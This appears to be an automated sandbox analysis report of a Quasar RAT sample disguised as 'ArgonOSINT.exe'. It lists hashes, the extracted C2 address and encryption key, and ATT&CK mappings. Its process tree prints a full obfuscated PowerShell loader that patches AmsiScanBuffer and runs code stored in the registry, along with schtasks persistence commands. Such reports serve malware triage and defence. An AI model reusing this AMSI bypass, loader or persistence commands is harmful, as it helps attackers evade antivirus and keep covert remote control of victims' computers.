Resubmissions

04-05-2024 05:10

240504-ft619aea3y 10

04-05-2024 05:06

240504-frlbrsdh81 10

Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04-05-2024 05:06

General

  • Target

    ArgonOSINT.exe

  • Size

    409KB

  • MD5

    c4f70954d48c8653fde31fc63c619fc8

  • SHA1

    c2fe0bc4eab66f6cbf19ab3a80817eba8084982e

  • SHA256

    dbc30b002dad39a45fdd36c509d854dc931662235886f01ec149cd8cf904ddb5

  • SHA512

    1a0db425192d25f1e96ac43a5ae18ff530ef11e2f1526fd6677f4b82b04e212679c347f5647be0d72665e2f587c2824b19d2104c48546eb049ae27fb7470defc

  • SSDEEP

    12288:UpyJcC+x6AoV5l+6KprKF/UV6u4W0pDs:kwd+mDsV6u4g

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    BfQu2aop09VkjugTkmuc

  • install_name

    $sxr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $sxr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 58 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of FindShellTrayWindow
        PID:992
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{4a17abea-f345-42f2-845c-9b88e27c16fe}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4916
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:636
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
        1⤵
          PID:744
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
          1⤵
            PID:900
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
            1⤵
              PID:484
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
              1⤵
                PID:600
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                1⤵
                  PID:1028
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                    PID:1044
                    • c:\windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:3012
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NRaUBpzixiGF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bWrDevTHrhQpZi,[Parameter(Position=1)][Type]$XTgTcyBMim)$BnVDFuKpaWm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+'l'+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+'l'+'a'+''+[Char](115)+'s'+','+''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$BnVDFuKpaWm.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'pec'+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'me'+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$bWrDevTHrhQpZi).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+'M'+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$BnVDFuKpaWm.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+'bl'+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+'i'+'r'+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$XTgTcyBMim,$bWrDevTHrhQpZi).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $BnVDFuKpaWm.CreateType();}$BbBfPpBrhjyWt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'e'+'M'+''+[Char](101)+''+'t'+''+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$mYIDxOVldItBDu=$BbBfPpBrhjyWt.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+'r'+[Char](111)+'c'+[Char](65)+''+'d'+'d'+[Char](114)+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+'lic,'+[Char](83)+''+'t'+''+'a'+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zGbiYgGXrmDOhxxfwBW=NRaUBpzixiGF @([String])([IntPtr]);$YlHYfQWNoViVQCFmowFoEg=NRaUBpzixiGF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$RvcobXAtZSW=$BbBfPpBrhjyWt.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+''+'o'+''+'d'+''+'u'+''+[Char](108)+'e'+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$arqnCsbBKLTSDm=$mYIDxOVldItBDu.Invoke($Null,@([Object]$RvcobXAtZSW,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+'br'+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$BmBLrDoorytGwNkut=$mYIDxOVldItBDu.Invoke($Null,@([Object]$RvcobXAtZSW,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$xZdFdIG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($arqnCsbBKLTSDm,$zGbiYgGXrmDOhxxfwBW).Invoke('am'+[Char](115)+'i.d'+[Char](108)+'l');$sSUBoAKGJzAcSeMmM=$mYIDxOVldItBDu.Invoke($Null,@([Object]$xZdFdIG,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+'S'+''+'c'+'a'+[Char](110)+''+[Char](66)+'uf'+[Char](102)+'e'+[Char](114)+'')));$zUDLDszaee=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BmBLrDoorytGwNkut,$YlHYfQWNoViVQCFmowFoEg).Invoke($sSUBoAKGJzAcSeMmM,[uint32]8,4,[ref]$zUDLDszaee);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$sSUBoAKGJzAcSeMmM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BmBLrDoorytGwNkut,$YlHYfQWNoViVQCFmowFoEg).Invoke($sSUBoAKGJzAcSeMmM,[uint32]8,0x20,[ref]$zUDLDszaee);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3728
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                      1⤵
                        PID:1080
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservice -s nsi
                        1⤵
                          PID:1128
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                          1⤵
                            PID:1192
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                            1⤵
                              PID:1280
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservice -s EventSystem
                              1⤵
                                PID:1300
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                1⤵
                                  PID:1308
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                  1⤵
                                    PID:1412
                                    • c:\windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2916
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                      1⤵
                                        PID:1472
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                        1⤵
                                          PID:1520
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                          1⤵
                                            PID:1536
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                            1⤵
                                              PID:1548
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                              1⤵
                                                PID:1640
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                1⤵
                                                  PID:1692
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                  1⤵
                                                    PID:1808
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1816
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                      1⤵
                                                        PID:1828
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                        1⤵
                                                          PID:2004
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2040
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1596
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                            1⤵
                                                              PID:2264
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2272
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                              1⤵
                                                                PID:2320
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                1⤵
                                                                  PID:2364
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                  1⤵
                                                                    PID:2396
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                    1⤵
                                                                      PID:2412
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2456
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                        1⤵
                                                                          PID:2464
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                          1⤵
                                                                            PID:2480
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                            1⤵
                                                                              PID:2500
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2948
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:2968
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                  1⤵
                                                                                    PID:2636
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:3264
                                                                                    • C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1104
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe" /rl HIGHEST /f
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:2864
                                                                                      • C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4144
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                          4⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:3464
                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1680
                                                                                      • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                        "SCHTASKS.exe" /create /tn "$77ArgonOSINT.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe'" /sc onlogon /rl HIGHEST
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:3516
                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                                      2⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:1836
                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                                      2⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2656
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3792
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:4036
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                        1⤵
                                                                                          PID:4728
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                          1⤵
                                                                                            PID:4468
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                            1⤵
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:3456
                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:3276
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                            1⤵
                                                                                              PID:4660
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:4436
                                                                                              • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:2076
                                                                                                • C:\Windows\System32\InstallAgent.exe
                                                                                                  C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4996
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                    1⤵
                                                                                                      PID:2892
                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      1⤵
                                                                                                        PID:1648
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{448AEE3B-DC65-4AF6-BF5F-DCE86D62B6C7}
                                                                                                        1⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:356

                                                                                                      Network

                                                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                                                      Execution

                                                                                                      Scheduled Task/Job

                                                                                                      1
                                                                                                      T1053

                                                                                                      Persistence

                                                                                                      Scheduled Task/Job

                                                                                                      1
                                                                                                      T1053

                                                                                                      Privilege Escalation

                                                                                                      Scheduled Task/Job

                                                                                                      1
                                                                                                      T1053

                                                                                                      Discovery

                                                                                                      Query Registry

                                                                                                      1
                                                                                                      T1012

                                                                                                      Peripheral Device Discovery

                                                                                                      1
                                                                                                      T1120

                                                                                                      System Information Discovery

                                                                                                      1
                                                                                                      T1082

                                                                                                      Command and Control

                                                                                                      Web Service

                                                                                                      1
                                                                                                      T1102

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\1601268389\715946058.pri
                                                                                                        Filesize

                                                                                                        171KB

                                                                                                        MD5

                                                                                                        30ec43ce86e297c1ee42df6209f5b18f

                                                                                                        SHA1

                                                                                                        fe0a5ea6566502081cb23b2f0e91a3ab166aeed6

                                                                                                        SHA256

                                                                                                        8ccddf0c77743a42067782bc7782321330406a752f58fb15fb1cd446e1ef0ee4

                                                                                                        SHA512

                                                                                                        19e5a7197a92eeef0482142cfe0fb46f16ddfb5bf6d64e372e7258fa6d01cf9a1fac9f7258fd2fd73c0f8a064b8d79b51a1ec6d29bbb9b04cdbd926352388bae

                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\4183903823\2290032291.pri
                                                                                                        Filesize

                                                                                                        2KB

                                                                                                        MD5

                                                                                                        b8da5aac926bbaec818b15f56bb5d7f6

                                                                                                        SHA1

                                                                                                        2b5bf97cd59e82c7ea96c31cf9998fbbf4884dc5

                                                                                                        SHA256

                                                                                                        5be5216ae1d0aed64986299528f4d4fe629067d5f4097b8e4b9d1c6bcf4f3086

                                                                                                        SHA512

                                                                                                        c39a28d58fb03f4f491bf9122a86a5cbe7677ec2856cf588f6263fa1f84f9ffc1e21b9bcaa60d290356f9018fb84375db532c8b678cf95cc0a2cc6ed8da89436

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                        Filesize

                                                                                                        162KB

                                                                                                        MD5

                                                                                                        152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                        SHA1

                                                                                                        c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                        SHA256

                                                                                                        a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                        SHA512

                                                                                                        2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                      • C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe
                                                                                                        Filesize

                                                                                                        409KB

                                                                                                        MD5

                                                                                                        c4f70954d48c8653fde31fc63c619fc8

                                                                                                        SHA1

                                                                                                        c2fe0bc4eab66f6cbf19ab3a80817eba8084982e

                                                                                                        SHA256

                                                                                                        dbc30b002dad39a45fdd36c509d854dc931662235886f01ec149cd8cf904ddb5

                                                                                                        SHA512

                                                                                                        1a0db425192d25f1e96ac43a5ae18ff530ef11e2f1526fd6677f4b82b04e212679c347f5647be0d72665e2f587c2824b19d2104c48546eb049ae27fb7470defc

                                                                                                      • C:\Windows\Temp\__PSScriptPolicyTest_a3a413il.knq.ps1
                                                                                                        Filesize

                                                                                                        1B

                                                                                                        MD5

                                                                                                        c4ca4238a0b923820dcc509a6f75849b

                                                                                                        SHA1

                                                                                                        356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                        SHA256

                                                                                                        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                        SHA512

                                                                                                        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                      • memory/584-72-0x000001DD6DAC0000-0x000001DD6DAEB000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/584-67-0x000001DD6DAC0000-0x000001DD6DAEB000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/584-65-0x000001DD6DAC0000-0x000001DD6DAEB000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/584-64-0x000001DD6DA90000-0x000001DD6DAB5000-memory.dmp
                                                                                                        Filesize

                                                                                                        148KB

                                                                                                      • memory/584-73-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/636-77-0x00000237BE0C0000-0x00000237BE0EB000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/636-83-0x00000237BE0C0000-0x00000237BE0EB000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/636-84-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/744-94-0x0000023564000000-0x000002356402B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/744-95-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/744-88-0x0000023564000000-0x000002356402B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/900-105-0x000002D90C250000-0x000002D90C27B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/900-106-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/900-99-0x000002D90C250000-0x000002D90C27B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/992-110-0x0000027F13D60000-0x0000027F13D8B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/1104-4-0x0000000073170000-0x000000007385E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/1104-6-0x00000000055E0000-0x00000000055F2000-memory.dmp
                                                                                                        Filesize

                                                                                                        72KB

                                                                                                      • memory/1104-3-0x00000000049C0000-0x0000000004A52000-memory.dmp
                                                                                                        Filesize

                                                                                                        584KB

                                                                                                      • memory/1104-0-0x000000007317E000-0x000000007317F000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/1104-20-0x0000000073170000-0x000000007385E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/1104-2-0x0000000004EC0000-0x00000000053BE000-memory.dmp
                                                                                                        Filesize

                                                                                                        5.0MB

                                                                                                      • memory/1104-1-0x0000000000090000-0x00000000000FC000-memory.dmp
                                                                                                        Filesize

                                                                                                        432KB

                                                                                                      • memory/1104-5-0x0000000004A60000-0x0000000004AC6000-memory.dmp
                                                                                                        Filesize

                                                                                                        408KB

                                                                                                      • memory/1104-7-0x00000000059D0000-0x0000000005A0E000-memory.dmp
                                                                                                        Filesize

                                                                                                        248KB

                                                                                                      • memory/3728-47-0x000001F7FC230000-0x000001F7FC25A000-memory.dmp
                                                                                                        Filesize

                                                                                                        168KB

                                                                                                      • memory/3728-48-0x00007FFE4AA30000-0x00007FFE4AC0B000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.9MB

                                                                                                      • memory/3728-25-0x000001F7E3CC0000-0x000001F7E3CE2000-memory.dmp
